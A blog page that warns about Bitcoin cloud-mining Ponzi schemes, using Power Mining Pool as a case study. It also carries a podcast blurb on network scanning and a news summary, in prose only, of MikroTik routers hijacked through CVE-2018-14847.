    With the overwhelming amount of cloud mining operations being Ponzi schemes, the industry virtually requires a shout-out from their hardware provider to ensure customers that there really are miners buzzing away on their behalf. If your cloud mining company can’t prove they own their hardware (without raising more questions) then you should reconsider.
  3. No pictures or recordings of their hardware or datacenter
    It is common practice for miners to be closed lipped about where their data centers are located. So, don’t expect to get robust images or recordings that dox the facility or owners. However, some evidence should exist and beyond their location, the pictures or video shouldn’t look to be hiding anything.
  4. No limits on how much hashing power you can lease
    Cloud mining providers will have a limited inventory of hashing power on hand at any time. Furthermore, expanding an operation’s inventory takes time and can be limited by the market supply of ASIC’s and other factors. It’s questionable for a cloud miner to not share their inventory supply with their customers. Most concerning, offenders will promise you instant and limitless scalability.
  5. Referral payouts schemes
    Often, mining Ponzi schemes will also feature a form of multi-level marketing to encourage members to bring on new investments. Members are incentivized to grow their own teams, and each new member they bring in increases their rewards.
  6. Anon operators
    If the owners are anonymous, move on. There is little-to-no reason to be an anonymous operator of a cloud mining service. If they provide identification, double check it, ask around, and do some due diligence. Is the owner hidden behind private registration? Has the domain been registered for less than six months? (You can find this information by searching for the platform’s URL registration details on a site like WHOis.net). The more information you can find about the people/company behind a website, the better.
  7. No clear path for divesting
    There should be well-defined methods for withdrawing funds or closing rental contracts.
  8. Guaranteed profits
    Quack, quack, quack!

If any of these red flags are present in the cloud mining business than take a moment and consider why.

Power Mining Pool: A Case Study for Cloud Mining Ponzi Schemes

Power Mining Pool was a typical Bitcoin mining pool Ponzi scheme and even included a multi-level marketing (MLM) styled referral system. Looking back it is a lot easier now to see the red flags that were present then. Hindsight is twenty-twenty. When a company expects you to send them money, but refuses to disclose any information about itself, you’re almost certainly being scammed. A WHOIS checkup shows that PowerMiningPool.com domain was registered on June 27, and the mining pool website launched online on September 4, 2017.

BitCoin Mining Scam

Red Flag #1 Power Mining Pool didn’t have a public mining address and didn’t allow for mining outside their own pool.

Red Flag #2 No endorsement or sign of approval from hardware suppliers. Nothing to be found on Reddit, Telegram, BitcoinTalk, and so on.

Red Flag #3 A serious lack of informative images. An archive of the Power Mining Pool shows a website riddled with stock images and vague copywriting. In addition to the generic images, there is a video that provides no additional insight into the company.

Red Flag #4 No limits to how much you can invest. Power Mining Pool sold hashing power in the form of shares, which any investor could purchase without limit. Shares would not only be your claim to the guaranteed returns but also provide you with more ability to climb the ranks of the MLM reward system.

Red Flag #5 From Associate to President Millionaire, members could climb the ranks by both acquiring new shares in the pool and successfully referring new members. At each new rank in membership, you received bonuses and higher returns. For you to move up in ranks, however, your referrals also needed to move up. Not only do you need to bring in new successful members, but your referrals do too. Sound familiar?

Red Flag #6 The founders of Power Mining Pool are brothers and live in central Europe. And that’s all the information available. Searching their names, Andrew and Mike Conti, is about as helpful as the caricatures of themselves on their about page. Additionally, a WHOIS search of the company’s domain shows the admin contacts hidden behind a domain name privacy service.

Red Flag #7 After the cease and desist, Power Mining Pool has up and left with members’ principal investments. Initially, there were accounts of members receiving their daily mining profits as promised. However, it’s common for early adopters of Ponzi schemes to see earnings while their principal investments are siphoned off.

Red Flag #8 “Every share you purchase will earn you €70.” That’s a promise plucked directly from the former subpage subtly titled opportunities. Each share costs members €50 which means Power Mining Pool is guaranteeing 40 percent returns.

Power Mining Pool is only one example of a Bitcoin cloud mining service riddled with red flags and warning signs. In fact, there are breadcrumbs of evidence linking Power Mining Pool to other operational Bitcoin cloud mining scams. Battling these schemes is a game of whack-a-mole: closing down one just creates three more.

Conclusion

The code is what makes the cryptocurrency work, and most legitimate cryptocurrency teams will make their codes ‘open source’. This means it is published openly, so anyone can read it, edit it, and check it is what the founders say it is. Of course, just because you can’t read the code yourself doesn’t mean not being able to see it is OK. If a cryptocurrency team is keeping their code secret, it should set off alarm bells.  Unless they have validated I.P., what are they trying to hide, but even then they would have long legal paperwork and patient documents they could show…..

Just because red flags are present doesn’t always mean you have identified a scam. They are early warning signs and alarms telling us to look a little deeper, investigate further, and remain skeptical. Questions and suspicions are not inherently dangerous themselves but ignoring them is. Power Mining Pool was peppered with reasons to raise concern and seek clarity. The answers provided to these questions should support unique technological offerings, business savvy, and this should all be logically connected. If operators don’t directly answer most of these questions see if they have other commonalities with know crypto scams as it may be another example in a long line of Bitcoin cloud mining Ponzi schemes. BitClub Network, HashOcean, Coinmulitplier Club, MinersLab, and Bitcoin Cloud Services are just a handful of other examples. Unscrupulous operators are swindling and cheating people out of their money. If you see reasons to be concerned, then share it with the community, ask the operators for clarity, and be cautious. Don’t keep it a secret.

Editor Jeremy Swenson
Writer Marshall Taylor

Abstract Forward Podcast #4: Network Scanning Tips With Chip Harris.

Chip Harris.jpgIn this episode, we have a deep conversation with CISO Consultant Chip Harris. We start with an overview of network scanning, both free open source tools like OpenVAS and other more costly options like Tenable. We then talk about red teaming, issues with data security lakes, the Equifax data breach, how leadership impacts security, and how threat actors are better at innovating than defenders typically are. We also cover the evolution of messaging, mobile device application hype and exploits, mobile application containerization, how the cyber kill chain came about, and a few things about the future of incident response.

Harris has an extensive background in government and business InfoSec engineering and red team planning and operations  — with over 25 years of experience designing and managing IT systems. His expertise is in identifying and solving problems by delivering projects and solutions. His experience includes serving as the IT lead and project manager within the business unit, evaluating system performance, helping business leaders and non-technical clients understand how technology can improve workflow, developing and enforcing standard IT practices, and ensuring IT compliance with regulations such as NERC CIP, PCI, GDPR, HIPAA, and SOX.

He has a Ph.D. in Cyber Security and Cyber Operations from the United States War College, a Masters in Cyber Security and Cyber Crime from the United States War College, and a Bachelors in Computer Science and Animation from Memphis College of Art. He has the following certifications: MCE, MCSE, NCE, MCSA, MCM, MCT, Security +, SUSE Novell Linux, Open SUSE Enterprise, Ubuntu Server Admin, PICK WMS, Backtrack 5, Netools 5, Dell Kace 3000 and 1000, IBM Q-Radar, Carbon Black, Tenable Security Suite, Dark Trace, Q-Radar, IBM Guardium, OWASP, Check Point, RHL, Kali Linux Certified, C|EH, C|PT, C|HFI, CCE, GIAC Rated, Barracuda, and he is even Tripwire Certified.

Fig 1. (OpenVAS Greenbone Scan Demo, 2018).
OpenVAS.png

Listen to the podcast here.


Learn more about Abstract Forward Consulting here.

Disclaimer:  This podcast does not represent the views of former or current employers and / or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective reason based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

Thousands of MikroTik Routers Hacked to Spy On Network Traffic

router-hacking.pngAt present more than 7,500 Mikrotik routers have been compromised with malware when attackers configured the devices to forward network traffic to a handful of IP addresses under their control (Shaun Nichols, The Register, 09/04/18). According to Chinese cyber research firm 360 Netlab the attackers obtained access to the devices by exploiting CVE (Common Vulnerabilities and Exposures) 2018-14847. Ironically this vulnerability had a patch available since April 2018.

This vulnerability is associated with Any Directory File Read (CVE-2018-14847) in MikroTik routers which was found as exploitable by the CIA Vault 7 hacking tool identified as Chimay Red, along with another MikroTik’s Webfig remote code execution vulnerability.

Since 08/24/18 the 360 Netlab honeypot network had picked up on more than 5 million devices with an open TCP/8291 port worldwide, of which 1.2 million are MikroTik devices. Out of those, about 31 percent, or 370,000, are vulnerable to the flaw (Tara Seals, Threatpost, 09/04/18).

The infection does not appear to be targeting any country, as the hacked devices reside across five different continents with Russia, Iran, Brazil, and India being the most commonly impacted. The top 10 countries with compromised MickroTik routers are (Ms. Smith, CSO Online, 09/04/18).

  1. 1,628 in Russia
  2. 637 in Iran
  3. 615 in Brazil
  4. 594 in India
  5. 544 in Ukraine
  6. 375 in Bangladesh
  7. 364 in Indonesia
  8. 218 in Ecuador
  9. 191 in the US
  10. 189 in Argentina

The researchers noted that the malware is also resilient to reboots, leaving a firmware update as the only permanent solution to the problem (Shaun Nichols, The Register, 09/04/18). “In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL,” Netlab writes.

Also, the attackers seek to infect victims with the browser-based Coinhive cryptomining script (Fig. 1). They achieve this by redirecting the HTTP proxy settings to an error page they created, where they placed the mining script. “By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users’ devices,” 360 Netlab researchers indicated.

Hive

However, the attackers made a mistake when they set up proxy access control lists that block all external web resources, including those required for the mining operation (Fig. 1).

360 Netlab says it does not know what the ultimate goal of the attacker will be. Their analysis shows that the attacker is particularly interested in ports 20, 21, 25, 110, and 144, which are for FTP-data, FTP, SMTP, POP3, and IMAP traffic. An unusual interest is in traffic from SNMP (Simple Network Management Protocol) ports 161 and 162, which researchers cannot explain at the moment (Shaun Nichols, The Register, 09/04/18).

“This deserves some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users’ network SNPM community strings?” 360 Netlab asks.

Bleeping computers research recommends that MikroTik users install the latest firmware version on the device. Based on the information provided by 360 Netlab users can check if HTTP proxy, Socks4 proxy, and network traffic capture features are active and exploited by a malicious actor (Ionut Ilascu, Bleeping Computer, 09/04/18).

Reach out to my company Abstract Forward Consulting if you have questions.